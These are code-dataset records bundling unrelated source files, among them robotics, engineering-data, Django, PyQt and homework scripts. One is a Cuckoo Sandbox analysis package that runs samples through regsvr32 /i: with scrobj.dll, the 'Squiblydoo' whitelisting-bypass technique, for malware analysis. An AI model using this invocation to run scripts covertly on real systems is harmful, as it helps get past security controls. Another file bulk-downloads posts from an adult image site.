This ROS Service client is used to request\n both pick and place poses in the /base frame of the robot.\n \"\"\"\n rospy.init_node(\"ik_house_of_cards\")\n\n # Wait for the All Clear from emulator startup\n rospy.wait_for_message(\"/robot/sim/started\", Empty)\n\n # Starting Joint angles for both arms\n left_start = {'left_w0': 0.6699952259595108,\n 'left_w1': 1.030009435085784,\n 'left_w2': -0.4999997247485215,\n 'left_e0': -1.189968899785275,\n 'left_e1': 0.6700238130755056,\n 'left_s0': -0.08000397926829805,\n 'left_s1': -0.9999781166910306}\n right_start = {'right_w0': -0.6699952259595108,\n 'right_w1': 1.030009435085784,\n 'right_w2': 0.4999997247485215,\n 'right_e0': 1.189968899785275,\n 'right_e1': 0.6700238130755056,\n 'right_s0': 0.08000397926829805,\n 'right_s1': -0.9999781166910306}\n\n # Two pick and place objects for each of DENIRO's arms\n hocl = PickAndPlace('left')\n hocr = PickAndPlace('right')\n\n # An orientation for gripper fingers to be overhead and parallel to the bricks\n orientation = Quaternion(\n x=-0.0249590815779,\n y=0.999649402929,\n z=0.00737916180073,\n w=0.00486450832011)\n\n lv_pick = Pose(\n position=Point(x=0., y=0., z=-0.),\n orientation=orientation)\n rv_pick = Pose(\n position=Point(x=0., y=0., z=-0.),\n orientation=orientation)\n lh_pick = Pose(\n position=Point(x=0.1, y=0, z=0.125312),\n orientation=orientation)\n rh_pick = Pose(\n position=Point(x=0., y=0., z=-0.),\n orientation=orientation)\n\n # base and height for the generated house of cards\n base = 3\n height = 1\n\n block_poses = house_builder(base, height)\n\n # move to the desired starting angles\n hocl.move_to_start(left_start)\n hocr.move_to_start(right_start)\n\n # spawn environment\n load_tables()\n\n # loop to pick and place the entire structure\n i = 0\n\n while not rospy.is_shutdown() and i < height:\n for j in range(len(block_poses[i])):\n if i % 2:\n print(\"\\nHorizontal block row\")\n if j % 2:\n print(\"\\nUsing left\")\n #spawn\n print(\"\\nPicking...\")\n hocl.pick(lh_pick)\n print(\"\\nPlacing...\")\n hocl.place(block_poses[i][j])\n else:\n print(\"\\nUsing right\")\n #spawn\n print(\"\\nPicking...\")\n hocr.pick(rh_pick)\n print(\"\\nPlacing...\")\n hocr.place(block_poses[i][j])\n else:\n print(\"\\nVertical block row\")\n if j % 2:\n print(\"\\nUsing left\")\n #spawn\n print(\"\\nPicking...\")\n hocl.pick(lv_pick)\n print(\"\\nPlacing...\")\n hocl.place(block_poses[i][j])\n else:\n print(\"\\nUsing right\")\n #spawn\n print(\"\\nPicking...\")\n hocr.pick(rv_pick)\n print(\"\\nPlacing...\")\n hocr.place(block_poses[i][j])\n j += 1\n i += 1\n return\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"Final_Submission/House_of_Cards.py","file_name":"House_of_Cards.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"42830972","text":"k = int(input())\nword = input()\nn = len(word)\nl = n-1\nways = 0\nprev = 0\nwhile l >= k:\n r = l - k\n if word[r] == word[l]:\n prev += 1\n ways += prev\n else:\n prev = 0\n l -= 1\nprint(ways)\n","sub_path":"yandex/day_5/I.py","file_name":"I.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"566112295","text":"\"\"\"\nScript to extract displacement and reaction force data from a tensile test with the aim of creating a load displacement curve\n\nInputs (variables to define):\n 1. cwd\n 2. odbname (no ext)\n 3. ULnode\n 4. 
UHnode\n\nOutput:\n None (file that contains RF, UL and UH for every time step up until fracture)\n\n\"\"\"\nimport sys\nfrom odbAccess import openOdb\ncwd = sys.argv[-1]\nodbname = sys.argv[-2]\noutputFname = sys.argv[-3]\nUHnode = int(sys.argv[-4])\nULnode = int(sys.argv[-5])\n\nodbname = odbname + '.odb'\n\nodb = openOdb(cwd + odbname)\nstepKey = odb.steps.keys()\nsteps = odb.steps[stepKey[-1]]\nall_frames = steps.frames\nlast_frame = all_frames[-1]\nassem = odb.rootAssembly\nhistData = list(steps.historyRegions.items())\nhistData = [(int(x[0].split('.')[-1]), x[1]) for x in histData[1:]]\nhistData.sort(key=lambda x: x[0])\nRF = [0.0]*len(histData[1][1].historyOutputs[histData[1][1].historyOutputs.keys()[0]].data)\nUL = []\nUH = []\nfor i in histData:\n hKeys = i[1].historyOutputs.keys()\n time = [t[0] for t in i[1].historyOutputs[hKeys[0]].data]\n if 'RF2' in hKeys:\n for c,k in enumerate(i[1].historyOutputs['RF2'].data):\n RF[c] = RF[c] + k[-1]\n if i[0] == ULnode:\n for c,k in enumerate(i[1].historyOutputs['U2'].data):\n UL.append(k[-1])\n if i[0] == UHnode:\n for c,k in enumerate(i[1].historyOutputs['U2'].data):\n UH.append(k[-1])\n\n\nRFplot = RF\nULplot = UL\nUHplot = UH\n\nwith open(cwd + outputFname, 'w') as fOut:\n for i in range(len(RFplot)):\n fOut.write(', \\t'.join([str(RFplot[i]),str(ULplot[i]),str(UHplot[i]), str(UHplot[i]-ULplot[i])])+ '\\n')\n\nodb.close()","sub_path":"ExtractFDcurve.py","file_name":"ExtractFDcurve.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"639308039","text":"'''\nState is a class that\ndescribe the state of NFA graph\n'''\nfrom typing import Dict\nfrom typing import Any\n\nfrom CONSTANT import *\nfrom nfa import *\n\nclass State(object):\n def __init__(self) -> None:\n self.ID = getId()\n self.IsEnd = False\n self.edgeMap = {} #type: Dict[str, Any]\n\n\n def addPath(self,edge:str,nfaState) -> None:\n if self.edgeMap.__contains__(edge):\n self.edgeMap[edge].append(nfaState)\n else:\n self.edgeMap[edge] = []\n self.edgeMap[edge].append(nfaState)\n\n","sub_path":"lab2/src/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"565264541","text":"# Copyright (C) 2010-2015 Cuckoo Foundation.\n# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org\n# See the file 'docs/LICENSE' for copying permission.\n\nimport os\nimport shutil\n\nfrom lib.common.abstracts import Package\n\nclass SCT(Package):\n \"\"\"Squiblydoo analysis package.\"\"\"\n PATHS = [\n (\"SystemRoot\", \"system32\", \"regsvr32.exe\"),\n ]\n\n def start(self, path):\n regsvr32 = self.get_path(\"regsvr32.exe\")\n arguments = self.options.get(\"arguments\")\n\n if arguments:\n args = '{0} /i:\\\"{1}\\\" scrobj.dll'.format(arguments, path)\n else:\n args = '/i:\\\"{0}\\\" scrobj.dll'.format(path)\n\n return self.execute(regsvr32, args, path)\n","sub_path":"analyzer/windows/modules/packages/sct.py","file_name":"sct.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"146266298","text":"import sys\nimport os\nfrom PyQt4 import QtGui, QtCore\n\ndef resource_path(relative):\n if hasattr(sys, \"_MEIPASS\"):\n return os.path.join(sys._MEIPASS, relative)\n return os.path.join(relative)\n\nclass DonateDialog(QtGui.QDialog):\n\n def __init__(self):\n super(DonateDialog, 
self).__init__()\n\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle('Donate Bitcoin')\n self.setWindowIcon(QtGui.QIcon(resource_path('data/icon.ico')));\n self.resize(350, 300)\n\n ok = QtGui.QPushButton(\"OK\")\n label_donate_bitcoin = QtGui.QLabel()\n address = QtGui.QLineEdit(\"\")\n label_qr_code = QtGui.QLabel()\n\n address.setAlignment(QtCore.Qt.AlignCenter)\n address.setReadOnly(True)\n address.setFixedWidth(250)\n\n label_donate_bitcoin.setPixmap(QtGui.QPixmap(resource_path('data/donate_bitcoin.png')))\n label_qr_code.setPixmap(QtGui.QPixmap(resource_path('data/qr_code.png')))\n\n vbox = QtGui.QVBoxLayout()\n hbox_buttons = QtGui.QHBoxLayout()\n\n # Horisontal buttons box (space, Ok, Cancel)\n hbox_buttons.addStretch(1)\n hbox_buttons.addWidget(ok)\n\n # Main vertical box\n vbox.addStretch(2)\n\n vbox.addWidget(label_donate_bitcoin, alignment = QtCore.Qt.AlignCenter)\n vbox.addStretch(2)\n vbox.addWidget(label_qr_code, alignment = QtCore.Qt.AlignCenter)\n vbox.addStretch(1)\n vbox.addWidget(address, alignment = QtCore.Qt.AlignCenter)\n vbox.addStretch(2)\n vbox.addLayout(hbox_buttons)\n\n self.setLayout(vbox)\n\n # Connect buttons to behaviour\n ok.clicked.connect(self.close)\n\nif __name__ == \"__main__\" :\n app = QtGui.QApplication(sys.argv)\n dialog = DonateDialog()\n dialog.show()\n sys.exit(app.exec_())\n","sub_path":"DonateDialog.py","file_name":"DonateDialog.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"22682959","text":"from stl import mesh\nfrom mpl_toolkits import mplot3d\nfrom matplotlib import pyplot\nfrom matplotlib import cm\nfrom numpy import array\nimport math\nimport stl\nimport numpy\n\ndef find_mins_maxs(obj):\n minx = maxx = miny = maxy = minz = maxz = None\n for p in obj.points:\n if minx is None:\n minx = p[stl.Dimension.X]\n maxx = p[stl.Dimension.X]\n miny = p[stl.Dimension.Y]\n maxy = p[stl.Dimension.Y]\n minz = p[stl.Dimension.Z]\n maxz = p[stl.Dimension.Z]\n else:\n maxx = max(p[stl.Dimension.X], maxx)\n minx = min(p[stl.Dimension.X], minx)\n maxy = max(p[stl.Dimension.Y], maxy)\n miny = min(p[stl.Dimension.Y], miny)\n maxz = max(p[stl.Dimension.Z], maxz)\n minz = min(p[stl.Dimension.Z], minz)\n return minx, maxx, miny, maxy, minz, maxz\n\ndef translate(_solid, step, padding, multiplier, axis):\n if axis == 'x':\n items = [0, 3, 6]\n elif axis == 'y':\n items = [1, 4, 7]\n elif axis == 'z':\n items = [2, 5, 8]\n for p in _solid.points:\n # point items are ((x, y, z), (x, y, z), (x, y, z))\n for i in range(3):\n p[items[i]] += (step * multiplier) + (padding * multiplier)\n\n\n#create new plot\nfigure = pyplot.figure()\naxes = mplot3d.Axes3D(figure)\n\n#load .stl file\nmesh = mesh.Mesh.from_file('/media/ruben/Seagate Expansion Drive/bachelorProject/test/Geit Gerda_Test_001.stl')\nprint('datatype:', type(mesh))\n\ntotal = len(mesh.v0) + len(mesh.v1) + len(mesh.v2)\nprint('Total amount of vertices: ', total)\n\n# #Put vertices in a file\n# file = open('vertices.txt', 'w')\n# for i in range(0,len(mesh.v0)):\n# triangle = str(mesh.v0[i]) + str(mesh.v1[i]) + str(mesh.v2[i]) + '\\n'\n# file.write(str(triangle))\n# file.close()\n\n#Auto scale to mesh size\n\nminx, maxx, miny, maxy, minz, maxz = find_mins_maxs(mesh)\nw = -maxx\nl = -maxy\nh = -maxz\n\ntranslate(mesh, w, 1, 1, 'x')\ntranslate(mesh, l, 1, 1, 'y')\ntranslate(mesh, h, 1, 1, 'z')\n\naxes.add_collection3d(mplot3d.art3d.Poly3DCollection(mesh.vectors, facecolor=(1,0,0), edgecolor='b'))\nscale 
= mesh.points.flatten()\naxes.auto_scale_xyz(scale, scale, scale)\n\naxes.set_xlabel('x')\naxes.set_ylabel('y')\naxes.set_zlabel('z')\n\npyplot.show()\n","sub_path":"code/readMask.py","file_name":"readMask.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"113223421","text":"import sys\nimport pandas as pd\nimport numpy as np\nimport joblib\nimport test_data_process as tdp\n\n\n\ndef RMSE(Y_predict):\n\n y_test = pd.read_csv('../data/testfoo.csv', sep = ',')\n y_test = y_test['Correct First Attempt']\n\n y_test_list = y_test.ravel().tolist()\n Y_predict_list = Y_predict.tolist()\n sumi = 0 \n\n\n\n # print(Y_predict_list)\n # print(y_test_list)\n for i in range(0,len(y_test_list)):\n sumi += (y_test_list[i]-Y_predict_list[i][1])**2\n\n rmse = pow(sumi/(len(Y_predict_list)-1), 0.5)\n\n #print(y_test_list)\n print(Y_predict_list)\n print(rmse)\n\n\n\ndef predict(testdata):\n\n \n #ss = joblib.load(\"../model/logistic_ss.model\") \n lr = joblib.load(\"./logistic_lr.model\")\n\n\n X_test = testdata\n print(testdata)\n # X_test = ss.transform(X_test) \n Y_predict = lr.predict_proba(X_test)\n\n RMSE(Y_predict)\n\n print(Y_predict)\n # print(y_test.ravel())\n\nif __name__ == '__main__':\n testdata = pd.read_csv(sys.argv[1], sep = ',')\n print(testdata.shape)\n predict(testdata)","sub_path":"src/predict_hot.py","file_name":"predict_hot.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"122335931","text":"\"\"\"\n Client Handler\n Status: OK\n Protocol version: 1.0\n\"\"\"\n\nimport requests\nimport logging\n\nclass ClientHandler:\n \"\"\"\n Send requests to the main server\n \"\"\"\n def __init__(self, request_url: str, api_key: str):\n \"\"\"\n args:\n api_key: The API key to authenticate to the server\n \"\"\"\n self.base_url = request_url\n self.api_key = api_key\n self.timeout = 30\n self.logger = logging.getLogger(__name__)\n\n def get_module_id(self, mlists: list) -> list:\n try:\n resp = requests.post(\n \"{}{}\".format(self.base_url, \"module/get/ids\"),\n json=\n {\n 'apiKey': self.api_key,\n 'UUID': mlists\n },\n timeout=self.timeout)\n resp.raise_for_status()\n except Exception as ex:\n self.logger.error(\"Exception handled: {}\".format(ex))\n return None\n jresp = resp.json()\n if jresp[\"code\"] != \"GENERIC_OK\":\n self.logger.error(\"KO: Error code {}\".format(jresp['code']))\n return None\n id_list = jresp.get('moduleIDS', [])\n if not id_list:\n self.logger.critical(\"Empty module ids. 
Execution stop.\")\n raise AssertionError\n return id_list\n\n def module_send_production(self, prod_d: dict) -> dict:\n try:\n resp = requests.post(\n \"{}{}\".format(self.base_url, \"module/production/send\"),\n json=\n {\n \"apiKey\": self.api_key,\n \"production\": prod_d\n },\n timeout=self.timeout)\n resp.raise_for_status()\n except Exception as ex:\n self.logger.error(\"Exception handled: {}\".format(ex))\n return None\n jresp = resp.json()\n if jresp[\"code\"] != \"GENERIC_OK\":\n self.logger.error(\"KO: Error code {}\".format(jresp['code']))\n return None\n return jresp.get(\"commande\", [])\n","sub_path":"client/network/client_handler.py","file_name":"client_handler.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"583410328","text":"# encoding: utf8\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport goatnails.db.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Article',\n fields=[\n (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),\n ('author', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field=u'id')),\n ('title', models.CharField(max_length=50)),\n ('text', models.TextField()),\n ('creation_date', models.DateField(auto_now=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Screenshot',\n fields=[\n (u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, to_field=u'id')),\n ('caption', models.CharField(max_length=500, blank=True)),\n ('creation_date', models.DateField(auto_now=True)),\n ('image', goatnails.db.models.ImageWithThumbsField(upload_to='uploads', blank=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"wildstar/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"273296803","text":"import math\nimport os\nimport re\nimport sys\nimport rule34\nimport gui\nimport urllib.request\nimport concurrent.futures\nfrom queue import Queue\nfrom timeit import default_timer as timer\nfrom time import sleep\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass r34DwnldrGUI:\n def __init__(self, _app: QtWidgets.QApplication):\n self.searchTerm = None # The currently entered search term\n self.directory = None # The save directory\n self.downloadImages = False\n self.downloadVideos = False\n self.saveURLS = False\n self.createSubfolder = False\n self.downloadLimit = -1\n\n self.r34 = rule34.Sync()\n self.totalExpected = 0 # How many posts are expected\n self.postList = []\n\n self.stopFlag = False # Tells the currently running threads to stop\n self.done = False # Set to true when the download completes\n\n self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=2)\n\n self.progBarQueue = Queue()\n self.etaQueue = Queue()\n self.lcdQueue = Queue()\n self.currentTaskQueue = Queue()\n\n self.app = _app\n self.uiWindow = QtWidgets.QMainWindow()\n self.ui = gui.Ui_Rule34Downloader()\n\n @staticmethod\n def processQueue(queue: Queue, uiSetFunc, name=\"unnamed\"):\n \"\"\"\n Processes a queue for ui events. 
Necessary to avoid access violations with PyQT (only main thread can set ui)\n\n :param queue: a queue of ui values to be set\n :param uiSetFunc: the function to handle setting these ui values\n :param name: optional, the name of this queue (for debugging)\n :return:\n \"\"\"\n while not queue.empty():\n value = queue.get()\n # print(f\"Processing {name} queue: {job}\")\n if value is not None:\n uiSetFunc(value)\n\n def clearExecutor(self, wait=True):\n \"\"\"Clears the executor, to avoid access violations\n These tend to occur when the user tries to run 2 downloads without closing\"\"\"\n print(\"s t o p\")\n self.stopFlag = True\n self.executor.shutdown(wait=wait)\n self.executor = concurrent.futures.ThreadPoolExecutor(max_workers=2)\n\n def runInExecutor(self, function, *args, **kwargs):\n \"\"\"Run a provided function in executor\"\"\"\n future = self.executor.submit(function, *args, **kwargs)\n while not future.done():\n if self.stopFlag or self.uiWindow.isHidden():\n # if uiWindow hidden, then the X button has been pressed\n self.stopFlag = True\n future.cancel()\n\n # process any pending ui sets\n self.processQueue(self.progBarQueue, self.ui.searchProgBar.setValue, name=\"ProgBar\")\n self.processQueue(self.etaQueue, self.ui.ETA.setText, name=\"ETA\")\n self.processQueue(self.lcdQueue, self.ui.searchLCD.display, name=\"LCD\")\n self.processQueue(self.currentTaskQueue, self.ui.currentTask.setText, name=\"CurrentTask\")\n\n # allow the ui system to process events\n self.app.processEvents()\n result = future.result()\n return result\n\n\n def _runAfterTask(self):\n self.checkCanBegin()\n self.ui.currentTask.setText(\"Idle\")\n\n def setupUI(self):\n \"\"\"Sets-up the ui\"\"\"\n self.app.setStyle(\"Fusion\")\n self.ui.setupUi(self.uiWindow)\n self.uiWindow.resize(500, 450)\n\n self.ui.searchProgBar.setValue(0)\n self.ui.destinationLine.setEnabled(False)\n self.ui.ETA.setText(\"0 seconds\")\n self.ui.currentTask.setText(\"Idle\")\n\n # setup events\n self.app.aboutToQuit.connect(self.quit)\n self.ui.browseButton.clicked.connect(self.browse)\n self.ui.searchButton.clicked.connect(self.search)\n self.ui.beginButton.clicked.connect(self.begin)\n self.ui.quitButton.clicked.connect(self.quit)\n self.ui.cancelButton.clicked.connect(self.cancel)\n self.ui.ckBoxSaveURLs.clicked.connect(self.checkCanBegin)\n self.ui.ckboxDownloadImages.clicked.connect(self.checkCanBegin)\n self.ui.ckBoxDownloadVideos.clicked.connect(self.checkCanBegin)\n\n self.uiWindow.show()\n\n def clearUI(self):\n \"\"\"Clears all ui elements\"\"\"\n self.ui.searchInput.setText(self.searchTerm)\n self.ui.destinationLine.setText(self.directory)\n self.ui.ckboxDownloadImages.setChecked(False)\n self.ui.ckBoxDownloadVideos.setChecked(False)\n self.ui.ckBoxSaveURLs.setChecked(False)\n self.ui.searchLCD.display(0)\n self.ui.ETA.setText(\"0 seconds\")\n self.ui.searchProgBar.setValue(0)\n # self.setProgBar()\n\n def toggleUI(self, state: bool):\n \"\"\"Allows you to disable all input ui, useful when downloading\"\"\"\n self.ui.searchButton.setEnabled(state)\n self.ui.browseButton.setEnabled(state)\n self.ui.beginButton.setEnabled(state)\n self.ui.ckBoxSaveURLs.setEnabled(state)\n self.ui.ckboxDownloadImages.setEnabled(state)\n self.ui.ckBoxSubfolder.setEnabled(state)\n self.ui.ckBoxDownloadVideos.setEnabled(state)\n self.ui.downloadLimit.setEnabled(state)\n\n def checkCanBegin(self):\n \"\"\"Checks if the program has all the information needed to download\"\"\"\n if self.searchTerm is not None and self.directory is not None:\n # if 
user has given a search term and a directory\n if self.ui.ckBoxSaveURLs.isChecked() or self.ui.ckBoxDownloadVideos.isChecked() or self.ui.ckboxDownloadImages.isChecked():\n # if the user has chosen at least 1 task\n return self.ui.beginButton.setEnabled(True)\n return self.ui.beginButton.setEnabled(False) # Disables the begin button\n\n def cacheUI(self):\n \"\"\"Caches the currently set options in the ui, so the threads dont need to access ui\"\"\"\n self.search()\n self.downloadImages = self.ui.ckboxDownloadImages.isChecked()\n self.downloadVideos = self.ui.ckBoxDownloadVideos.isChecked()\n self.saveURLS = self.ui.ckBoxSaveURLs.isChecked()\n self.createSubfolder = self.ui.ckBoxSubfolder.isChecked()\n self.downloadLimit = self.ui.downloadLimit.value()\n\n def _gatherPosts(self):\n \"\"\"Gathers posts from rule34 for a given tag\"\"\"\n postList = []\n\n if self.totalExpected == 0:\n self.search()\n estimatedPages = math.ceil(self.totalExpected/100)\n times = []\n\n # you could just gather all images at once, but because i want a progress bar, i have to do it manually\n for i in range(estimatedPages):\n start = timer()\n if self.stopFlag:\n return\n self.progBarQueue.put(int(\n (i / estimatedPages) * 100\n ))\n averageTime = sum(times) / len(times) if len(times) != 0 else 0.423\n eta = (estimatedPages-i) * averageTime\n if eta < 60:\n self.etaQueue.put(\n f\"{float(eta):.3} seconds\"\n )\n else:\n self.etaQueue.put(\n f\"{float(eta)/60:.3} minutes\"\n )\n page = self.r34.getImages(singlePage=True, OverridePID=i, tags=self.searchTerm)\n\n # process this page\n for post in page:\n video = (post.file_url.endswith(\"mp4\") or post.file_url.endswith(\"webm\")) # is this a video?\n if self.downloadImages or self.downloadVideos:\n if not self.downloadVideos:\n # if user doesnt want videos\n if video:\n continue\n elif self.downloadVideos and not self.downloadImages:\n # if user wants videos, but not images\n if not video:\n continue\n postList.append(post)\n\n self.lcdQueue.put(len(postList))\n\n # apply download limit if set\n if self.downloadLimit != -1:\n postList = postList[:self.downloadLimit]\n\n self.postList = postList\n end = timer()\n times.append(end-start)\n times = times[-100:]\n average = sum(times) / len(times)\n print(f\"Average time: {average}\")\n self.progBarQueue.put(100)\n return\n\n def _download(self):\n \"\"\"Downloads all posts in postList\"\"\"\n self.currentTaskQueue.put(f\"Downloading {len(self.postList)} posts\")\n # process directory\n directory = self.directory\n if self.createSubfolder:\n tempTag = re.compile('[^a-zA-Z]').sub('_', self.searchTerm) # clear non alpha-numeric characters\n newPathName = '_'.join(tempTag.split(\" \")) # clear spaces\n directory += f\"/{newPathName}\"\n if not os.path.isdir(directory):\n print(\"creating sub-folder\")\n os.mkdir(directory)\n\n numDownloaded = 0 # How many posts have been downloaded\n ETA = 0 # how many seconds estimated left\n times = [] # stores a list of execution times\n urlFile = None # the file for saving urls, if used\n\n if self.saveURLS:\n # if the user wants urls saved, create the file here\n print(\"Creating url file\")\n urlFileDir = f\"{directory}/urls.txt\"\n urlFile = open(urlFileDir, \"w\")\n urlFile.write(f\"### URLs for search: {self.searchTerm} ###\\n\")\n\n for post in self.postList:\n average = (sum(times) / len(times)) if len(times) != 0 else 5\n ETA = average * (len(self.postList) - numDownloaded)\n if ETA < 60:\n self.etaQueue.put(\n f\"{float(ETA):.3} seconds\"\n )\n else:\n self.etaQueue.put(\n 
f\"{float(ETA)/60:.3} minutes\"\n )\n\n self.progBarQueue.put(int(\n numDownloaded/len(self.postList)*100\n ))\n\n start = timer()\n if self.stopFlag:\n self.stopFlag = False\n if urlFile:\n urlFile.close()\n self.done = True\n return\n\n name = \"{}/{}.{}\".format(directory, post.id.split(\"/\")[-1], post.file_url.split(\".\")[-1])\n video = (\"webm\" in name or \"mp4\" in name)\n\n try:\n if self.saveURLS:\n print(\"Writing to file\")\n urlFile.write(\"\\n\" + post.file_url)\n\n if self.downloadImages or self.downloadVideos:\n if video and not self.downloadVideos:\n continue\n if not video and not self.downloadImages:\n continue\n\n if not os.path.isfile(name):\n with urllib.request.urlopen(post.file_url) as f:\n imageContent = f.read()\n # i use a download temp file because if the download is interrupted,\n # its obvious which is the garbled file\n with open(f\"{directory}/download.temp\", \"wb\") as _f:\n _f.write(imageContent)\n os.rename(f\"{directory}/download.temp\", name)\n\n numDownloaded += 1\n self.lcdQueue.put(numDownloaded)\n except Exception as e:\n print(f\"Skipping post due to error: {e}\")\n\n end = timer()\n times.append(end-start)\n times = times[-100:]\n if urlFile:\n urlFile.close()\n\n self.done = True\n return\n\n# region: button actions\n\n\n def browse(self):\n \"\"\"Opens the browse menu\"\"\"\n print(\"Browse button pressed\")\n self.ui.currentTask.setText(\"Waiting for directory\")\n\n # open a directory selection dialogue\n self.directory = str(QtWidgets.QFileDialog.getExistingDirectory(self.uiWindow, \"Select Directory\"))\n self.ui.destinationLine.setText(self.directory)\n\n self._runAfterTask()\n\n def search(self):\n \"\"\"Calls rule34 to search for images with given tag(s)\"\"\"\n print(\"Search button pressed\")\n self.ui.currentTask.setText(\"Searching Rule34\")\n\n self.searchTerm = self.ui.searchInput.text().replace(\",\", \"\").strip()\n self.ui.searchProgBar.setValue(25)\n # self.setProgBar(25)\n\n # technically this shouldn't need its own thread, but in theory it could crash the main thread, so im being safe\n self.totalExpected = self.runInExecutor(self.r34.totalImages, self.searchTerm)\n self.ui.searchProgBar.setValue(100)\n # self.setProgBar(100)\n self.ui.searchLCD.display(self.totalExpected)\n\n self._runAfterTask()\n\n def begin(self):\n \"\"\"Prepares the postList and starts the download\"\"\"\n print(\"Begin button pressed\")\n self.ui.currentTask.setText(\"Gathering and validating posts\")\n\n # disable the ui so user cant modify anything\n self.toggleUI(False)\n self.cacheUI()\n # gathers posts from r34 in separate thread\n self.runInExecutor(self._gatherPosts)\n\n self.runInExecutor(self._download)\n\n self.totalExpected = 0\n self.imgList = []\n self.stopFlag = False\n self.ui.ETA.setText(\"0 seconds\")\n if self.done:\n self.ui.currentTask.setText(\"Download Complete!\")\n self.ui.searchProgBar.setValue(100)\n\n # flash taskbar icon, and make a notification sound\n self.app.alert(self.uiWindow, msecs=0)\n self.app.beep()\n\n self.done = False\n self.toggleUI(True)\n\n def cancel(self):\n \"\"\"Clears the app, as if it had just opened\n If a download is currently running, thats stopped too\"\"\"\n print(\"Cancel\")\n self.toggleUI(False) # Make sure ui is disabled while we cancel\n\n # clear variables\n self.searchTerm = None\n self.directory = None\n self.totalExpected = 0\n self.imgList = []\n self.stopFlag = True\n self.done = False\n\n try:\n # wait for any download tasks to end\n self.clearExecutor()\n except:\n pass\n 
self.stopFlag = False\n\n self.clearUI()\n self.ui.currentTask.setText(\"Cancelled!\")\n self.toggleUI(True)\n self.checkCanBegin()\n\n def quit(self):\n \"\"\"As the name suggests\"\"\"\n print(\"Quit button pressed\")\n self.clearExecutor(wait=False)\n self.app.exit()\n\n# endregion\n\n\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n _r34D = r34DwnldrGUI(app)\n _r34D.setupUI()\n sys.exit(app.exec_())\n\n","sub_path":"mainGUI.py","file_name":"mainGUI.py","file_ext":"py","file_size_in_byte":14807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"255700135","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 3 17:41:39 2021\n\n@author: Homework-16\n\"\"\"\n# 1 assignment\n# buxoriy = {\n# 'ism':'Abu Abdulloh Muhammad ibn Ismoil',\n# 'tyil':'810',\n# 'shahar':'buxoro',\n# 'vyil':60\n# }\n# qodiriy = {\n# 'ism':'abdulla qodiriy',\n# 'tyil':'1984',\n# 'shahar':'toshkent',\n# 'vyil':44\n# }\n# vohidov = {\n# 'ism':'erkin vohidov',\n# 'tyil':'1936',\n# 'shahar':'fargona',\n# 'vyil':80\n# }\n# navoi = {\n# 'ism':'alisher navoi',\n# 'tyil':'1441',\n# 'shahar':'xirot',\n# 'vyil':60\n# }\n\n# adabiyot = [buxoriy, qodiriy, vohidov, navoi]\n# for adab in adabiyot:\n# print(f\"{adab['ism'].title()}, \"\n# f\"{adab['tyil']}-yilda,\"\n# f\"{adab['shahar'].title()}da tavallud topgan.\"\n# f\"{adab['vyil']} yil umr kurgan\")\n\n# 2 assignment\n\n# shaxslar = {\n# 'abu Abdulloh Muhammad ibn Ismoil':['Al-Jome as sahih', 'Al-adab al-mufrat',\n# 'At-tarix al-kabir', 'At-tarix as-sagir'],\n# 'abdulla qodiriy':['Otgan kunlar', 'Mehrobdan chayon', 'Obid ketmon'],\n# 'erkin vohidov':['Tong nafasi', 'Qoshiqlarim sizga','Ozbegim', \n# 'Qiziquvchan Matsuma'],\n# 'alisher navoi':['Xamsa', 'Lison ut-Tayr', 'Mahbub Al-qulub', 'Munojot']\n# }\n# for ism, asarlar in shaxslar.items():\n# print(f\"\\n{ism.title()}ning mashxur asarlari: \")\n# for asar in asarlar: \n# print(asar.upper())\n\n# 3 Assignment\n\n# kinolar = {\n# 'ali':['terminator', 'rambo', 'titanic'],\n# 'vali':['tenet','inception','interstellar'],\n# 'hasan':['abdullajon','bomba','shaytanat'],\n# 'husan':['mahallada duv-duv gap','john wick']\n# }\n# for ism, movies in kinolar.items():\n# print(f\"\\n{ism.title()}ning sevimli kinolari: \")\n# for kino in movies:\n# print(kino.title())\n \n# davlatlar = {\n# 'ozbekiston':{'poytaht':'toshkent','hududi':448978,\n# 